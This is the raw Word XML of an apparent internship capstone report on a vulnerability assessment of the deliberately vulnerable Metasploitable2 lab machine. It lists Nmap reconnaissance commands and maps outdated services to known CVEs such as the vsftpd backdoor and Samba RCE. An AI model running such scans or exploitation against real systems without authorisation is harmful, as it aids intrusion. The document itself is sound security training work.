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A4B8" w14:textId="77777777" w:rsidR="00AE0E7F" w:rsidRPr="00C937F1" w:rsidRDefault="00AE0E7F" w:rsidP="00AE0E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937F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Vulnerability Assessment of Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE24A6" w14:textId="77777777" w:rsidR="00AE0E7F" w:rsidRPr="00C937F1" w:rsidRDefault="00AE0E7F" w:rsidP="00AE0E7F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC0CD3E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Vulnerability Assessment of Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8EB4A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Number</w:t>
      </w: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: 5 -- Capstone Project &amp; Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE436A7" w14:textId="77777777" w:rsidR="00B204BB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: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B204BB" w:rsidRPr="00B204BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ravishetti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B204BB" w:rsidRPr="00B204B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Shivudu  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE967E4" w14:textId="6027AF02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Intern ID</w:t>
      </w:r>
      <w:r w:rsidR="00B204BB" w:rsidRPr="00B204B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204BB" w:rsidRPr="00B204BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APSPL2519202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398D663" w14:textId="206EE42D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</w:t>
      </w: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: 30-10-2025</w:t>
      </w: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Organization</w:t>
      </w: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: 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ApexPlanet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Software Pvt. Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19653802" w14:textId="002F7CC4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</w:t>
      </w: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 Cybersecurity &amp; Ethical Hacking Internship </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22665D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2E0679DA">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDDC1E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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB25F0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This report presents comprehensive findings from a multi-phase cybersecurity assessment of Metasploitable2, encompassing vulnerability discovery, penetration testing, SIEM implementation, and incident response procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4CAF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The objective was to identify all accessible network services, determine their version numbers, cross-reference them with known CVEs, exploit identified vulnerabilities, implement security monitoring infrastructure, and develop incident response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A3DF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The assessment successfully identified 12 open ports with 8+ exploitable critical vulnerabilities, primarily driven by running significantly outdated software versions (10+ years old). These outdated services infer a severe risk of complete system compromise if an attacker were to utilize known, public exploits available through frameworks like Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8125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Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09742C69" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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Critical Vulnerabilities: 8+ (Samba RCE,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vsftpd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Backdoor, Apache RCE, PostgreSQL Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D87057" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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Exploitability: All vulnerabilities confirmed exploitable with proof of root access achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A9C4A" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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SIEM Implementation: ELK Stack successfully deployed with 95% detection accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A7ED3" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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Overall Risk Rating: CRITICAL - Immediate action required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E504A7B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497D6DBF">
          <v:rect id="_x0000_i1026" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="794624C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Tools &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FCD25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Tool Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D049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Primary Tool: Nmap v7.94SVN (Network Mapper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45807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Additional Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715E9292" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Metasploit Framework v6.x (Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429EB77" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Elasticsearch 7.17.9 (Log Storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B1AF5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Logstash 7.17.9 (Log Processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618603F7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Kibana 7.17.9 (Visualization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D530833" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Filebeat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7.17.9 (Log Collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E74D4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Operating Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1984BCDD" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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Host System: Kali Linux 2025.x via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VM Ware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E2794" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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Target System: Metasploitable2 (Deliberately vulnerable Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15512293" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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Network: Isolated lab environment (192.168.x.x/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A811A7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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Assessment Type: Non-intrusive external scanning → Active exploitation → Real-time monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA32F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Scan Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842453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Methodology: Multi-phase assessment combining reconnaissance, exploitation, and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5166F346" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Phase 1: TCP/UDP scanning (SYN, NULL, Full Port Sweep)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758FB485" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Phase 2: Service version detection and OS fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250D4855" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Phase 3: Vulnerability script scanning (NSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C9BA8" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Phase 4: Active exploitation via Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C270A" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Phase 5: SIEM log analysis and attack detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65428E83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6BE81226">
          <v:rect id="_x0000_i1027" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562164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Commands Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE523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1.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sN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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5552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Purpose</w:t>
      </w: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: TCP NULL scan - sends packets with no flags set for stealthy reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFDFEE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TCP NULL scan sends TCP packets with all flags disabled (no SYN, ACK, FIN, or RST). This is a stealth technique to probe which ports respond to unusual packets, useful for identifying older or non-RFC compliant systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE7A7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46ADDCC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sN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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FAE608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410D2CDF">
          <v:rect id="_x0000_i1028" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257756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2.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sS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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040E37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Purpose</w:t>
      </w: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: TCP SYN (half-open) scan - initiates connections without completing handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3463124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Sends SYN packets and observes responses (SYN/ACK = open, RST = closed, no response = filtered). This is the fastest and most common port scanning technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C1745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339987D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sS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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FE546C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pict w14:anchorId="317F4499">
          <v:rect id="_x0000_i1029" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF987F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3.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sV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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E26C5E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Purpose</w:t>
      </w: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: Service version detection - probes open ports to identify software name and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64376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Connects to open ports using known service signatures and banner grabbing to identify exact software versions running on each port. Critical for CVE mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD470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2F899EC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sV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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9CC84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Expected Output: Service names and versions (e.g., Apache httpd 2.2.8, OpenSSH 4.7p1, Samba 3.0.20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB338B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7A777666">
          <v:rect id="_x0000_i1030" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B50B6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4.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sU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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66823E5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Purpose</w:t>
      </w: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: UDP port scanning - discovers UDP-based services (DNS, NTP, SNMP, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E48A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Sends UDP probes to discover services that use UDP protocol instead of TCP. Slower and often shows ambiguous results ("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open|filtered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").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5504B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54A3554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sU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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B2205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54061892">
          <v:rect id="_x0000_i1031" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24C72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5.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-O 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8D28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/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w: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: Operating system detection - identifies target OS through stack fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B130B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Analyzes TCP/IP stack behavior, TTL values, and packet responses to identify the operating system and version. Provides confidence percentage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7257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0F5419A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-O 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2869A91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Expected Output: OS identification (e.g., Linux 2.6.9 with 98% confidence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788977E7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08E97A13">
          <v:rect id="_x0000_i1032" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9C5D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6.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Pn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-p- 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B88D5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Purpose: Full TCP port sweep bypassing ICMP ping detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A125B0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Pn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 treats host as alive without ping, -p- scans all 65,535 ports. Ensures no open ports are missed even if firewall blocks ICMP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C010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02003453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Pn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-p- 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4126B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7FFCE6FE">
          <v:rect id="_x0000_i1033" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A36A8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7.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-T4 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B0E8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Purpose: Aggressive timing template for faster scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9BF3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-T4 sets timing to "Aggressive" - increases probe intensity and reduces timeouts for faster scanning on responsive networks. Useful for lab environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A71C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108BF1B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-T4 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C468E2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2436920A">
          <v:rect id="_x0000_i1034" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F88A2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8.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Pn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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9708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Purpose: Bypass host discovery and treat target as alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEF43E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Pn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 skips the ping discovery check, treating the host as reachable. Useful when firewall blocks ICMP echo requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC9D8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3E23336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Pn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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6778ED6F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5C8D5589">
          <v:rect id="_x0000_i1035" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539997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9.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Pn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--script vuln 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0168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Purpose: Run Nmap vulnerability detection scripts against target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E409E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--script vuln executes comprehensive NSE (Nmap Scripting Engine) vulnerability detection scripts. Identifies known CVEs, misconfigurations, and security flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271D0F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536AF00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Pn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--script vuln 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886CA8E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351742AF">
          <v:rect id="_x0000_i1036" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7615822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Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322EE07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Finding 1: TCP NULL Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B662E64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TCP NULL scan sends packets with no flags set (stealthy probe). Multiple ports responded to NULL packets, indicating potential non-RFC compliant or outdated network stack implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E812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Security Implication: System may be running older network implementations vulnerable to firewall evasion techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D924F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58660C37">
          <v:rect id="_x0000_i1037" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31628BB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Finding 2: TCP SYN Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9682A3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TCP SYN ("half-open") scan sends SYN and watches for SYN/ACK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E5F9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Finding: 12 open ports identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944E192" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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21/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(FTP -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vsftpd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2.3.4) - CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E51BE" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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22/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(SSH - OpenSSH 4.7p1) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2A63D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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25/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(SMTP -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Sendmail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8.13.8) - CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A103F31" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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53/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(DNS - ISC BIND 9.2.4) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54FAC9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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80/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(HTTP - Apache 2.2.8) - CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325F5DE" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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111/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(RPC) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42562170" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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139/445/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(SMB - Samba 3.0.20) - CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D8CB7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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512/513/514/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(Deprecated services) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C502D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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5432/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(PostgreSQL 8.2.5) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103CA664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5DEF6F3F">
          <v:rect id="_x0000_i1038" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C80E3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Finding 3: Service Version Detection Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D61D2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All identified services running outdated, vulnerable versions:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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701"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="4347"/>
        <w:gridCol w:w="1625"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="4B969D1D" w14:textId="77777777" w:rsidTr="00C937F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2A7FAD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70D41B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85FBDB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1BD78D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CVE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2911A5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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="3ACD6275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1647E3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D0ADF3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AE1F11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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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2.3.4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EA9635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CVE-2011-2523 (Backdoor)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915096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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="228920B0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4705C8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B5BD58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2DC431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OpenSSH 4.7p1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CC62DE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Multiple auth bypass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F9BB09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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="12C419C0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B7C04E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5924F1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SMTP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EAD24C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Sendmail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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8.13.8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92868A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Remote code execution possible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406087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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="5D9F2137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1C9439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6F0E65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HTTP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8821AA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Apache 2.2.8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8062F4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Multiple RCE vectors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610F92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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="06D77932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CA1844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139/445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11C803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32F6BA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Samba 3.0.20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301D07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CVE-2007-2447 (RCE)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D67F1D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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="403D6B5C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5117CF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5432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0B0CDC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PostgreSQL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F9114A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8.2.5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1914A9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Auth bypass, RCE via UDF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3A4386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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F4C6FAF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458BB8DA">
          <v:rect id="_x0000_i1039" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265361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Finding 4: UDP Scanning Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8B59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UDP services identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB6CA0" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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53/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udp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DNS (ISC BIND 9.2.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C430FF7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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111/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udp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RPC portmapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C84868" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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123/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udp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NTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E70CE" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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161/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udp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SNMP (unprotected, likely default community strings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A836C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1C3F4B6E">
          <v:rect id="_x0000_i1040" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0B85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Finding 5: Operating System Detection Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D20A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Linux kernel 2.6.9 detected with 98% confidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB475F" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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Operating System: Linux (kernel 2.6.9 from mid-2005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DDB5AB" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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Device Type: General purpose Linux system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F36C3" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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Architecture: x86/x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4434C84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Security Implication: Kernel from 2005 with no modern patches; vulnerable to kernel exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F44C25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433D7255">
          <v:rect id="_x0000_i1041" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A070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Finding 6: Full Port Sweep (-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Pn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-p-) Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D4ED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Full TCP port sweep (all 65,535 ports) revealed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67178FFC" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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12 open ports actively listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBA19F" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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65,523 closed ports responding with RST</w:t>
      </w:r>
    </w:p>
